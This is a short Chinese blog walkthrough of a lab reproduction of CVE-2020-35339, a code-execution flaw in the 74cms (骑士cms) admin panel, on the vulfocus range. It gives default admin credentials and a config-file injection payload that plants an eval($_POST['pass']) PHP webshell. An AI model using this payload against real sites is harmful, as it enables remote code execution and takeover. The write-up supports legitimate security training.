-
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
目录
一、靶场环境
1.1、平台:
123.58.224.8:57171
123.58.224.8:36168
123.58.224.8:36168
1.2、知识:
1、配置文件错误配置(审计)
此题漏洞点在配置文件,且配置文件是php后缀
2、php语句
应该让写入的代码为php语言执行,而不是字符串。可以使用‘闭合,再用,使其独立
(还得考虑是否被过滤了)
1.3、描述:
管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行
二、漏洞验证
2.1、分析
在URL后面加上/index.php?m=Admin
(访问后台)
题目提示:账号密码均为
adminadmin
插入PHPinfo()
http://127.0.0.1/.',phpinfo(),'/.com
刷新页面后,又回到了后台登陆页面
现在一登陆进去就是这个页面了
写入后门连接代码
http://127.0.0.1/.',eval($_POST['pass']),'/.com
点击保存修改
刷新页面后,又回到了后台登陆页面
http://123.58.224.8:61983/index.php?m=Admin&c=index&a=login
2.4、解题:
或者
-
相关阅读:
M4Singer Ubuntu 4060ti16G 笔记【2】
函数形状有几种定义方式;操作符infer的作用
【MySQL】内置函数——日期函数
电机带宽的形象理解
SmartIDE v0.1.19 - 码云(Gitee)最有价值开源项目奖项、工作区策略、类虚拟机镜像VMLC、Server安装手册
改名Meta,杀死Oculus,Facebook是押注元宇宙还是“金蝉脱壳”?
为华生物NH2-PEG-NH2氨基聚乙二醇氨基的简介及应用说明
天锐绿盾是干什么的?——防止公司内部核心文件数据资料外泄软件,图档加密 | 源代码加密、源码防泄露系统
day35-IO流02
狂神的MySQL(1)
- 原文地址:https://blog.csdn.net/qq_53079406/article/details/127301708